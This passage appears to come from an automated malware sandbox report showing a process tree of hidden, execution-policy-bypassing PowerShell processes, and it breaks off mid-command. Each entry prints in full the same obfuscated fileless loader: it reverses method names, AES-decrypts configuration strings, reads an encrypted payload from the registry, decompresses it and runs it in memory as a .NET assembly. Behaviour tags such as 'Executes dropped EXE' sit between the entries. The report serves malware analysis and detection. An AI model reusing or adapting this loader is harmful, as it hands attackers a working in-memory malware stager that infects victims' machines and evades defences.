$zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5128
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5348
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1156
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2480
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5468).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = 